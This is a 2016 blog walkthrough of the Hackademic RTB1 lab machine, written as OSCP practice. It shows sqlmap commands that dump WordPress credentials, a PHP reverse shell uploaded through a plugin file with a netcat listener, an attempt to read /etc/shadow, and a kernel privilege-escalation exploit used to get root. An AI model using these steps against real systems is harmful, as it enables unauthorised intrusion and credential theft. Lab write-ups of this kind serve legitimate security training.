Sunday 31 January 2016

Hackademic 1


Probably many of you heard about OSCP (Offensive Security Certified Professional) cerification.
If so, and you are wondering about trying this hard certification, this solution of Hackademic 1, may be helpful for you.

I run Kali Linux and our target via VMware Workstation.

At the beginning we have to perform scanning, and find our target IP. So, our target has 192.168.1.103 IP address. Let's play the ball!


















and enumerate services of our target












Great! We are able to browse the web application. We see following webpage:


















Nothing interesting... Hmmm, maybe will be something in source?














We verified that the web application uses WordPress version 1.5.1.1 (so old) - that is a juicy information!
Now we know that admin panel will be in one of the following default localizations: wp-admin.php, wp-login.php, login.php or admin.php.
But in spite of this finding, we don't have credentials.

Dirbuster guessed several files and directories


















While walking through the application I paid attention to following URL:
http://192.168.1.103/Hackademic_RTB1/?cat=1
Maybe cat parameter is vulnerable to SQL Injection for example?

I run sqlmap:
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat
BINGO! cat parameter is vulnerable!
We retrieved names of databases
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat --dbs















The wordpress database looks interesting...
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress --tables















The wp-users table may contain WordPress credentials....
sqlmap -u "http://192.168.1.103/Hackademic_RTB1/?cat=1" --level 5 --risk 3 -p cat -D wordpress -T wp_users --dump
 We have got credentials
NickJames | admin
JohnSmith | PUPPIES
GeorgeMiller | q1w2e3
TonyBlack | napoleon
JasonKonnors | maxwell
MaxBucky | kernel
 So we have to find who is an administrator, because an administrator of WordPress is able to upload files (in particular PHP code).

We visit
http://192.168.1.103/Hackademic_RTB1/wp-login.php
 and now we are sure that GeorgeMiller account is the most important, because has access to upload files feature.





















We are able to copy content of webshell from kali and paste to the wp-content/plugins/hello.php
/usr/share/webshells/php/php-reverse-shell.php
I set up
$ip = my IP;
$port = 4444;

and I execute NetCat
nc -nlvp 4444
We have to also open URL











Excellent!! We have got limited shell!
The first of all, we execute following command
python -c "import pty;pty.spawn('/bin/bash')"
This command gives us trust CLI.
We don't have access to content of /home directory, we are able to find credentials to MySQL. Unfortunately raptor_udf2 exploit doesn't work.
Also cat /etc/shadow doesn't work, because apache user doesn't have privilege to open /etc/shadow file.
Maybe our target OS is out of date? Let's try!
bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
OK! Let's find some exploit for Linux 2.6.X to escalate our privileges
Searching...
I find Linux Kernel <= 2.6.36-rc8 - RDS Protocol Local Privilege Escalation
We have to download the exploit and upload it to vulnerable server and execute of course.


















Amazing! We are root, let's execute

sh-4.0# cat /root/key.txt
cat /root/key.txt
Yeah!!
You must be proud because you 've got the password to complete the First *Realistic* Hackademic Challenge (Hackademic.RTB1) :)

$_d&jgQ>>ak\#b"(Hx"o<la_%

Regards,
mr.pr0n || p0wnbox.Team || 2011
 Game over
at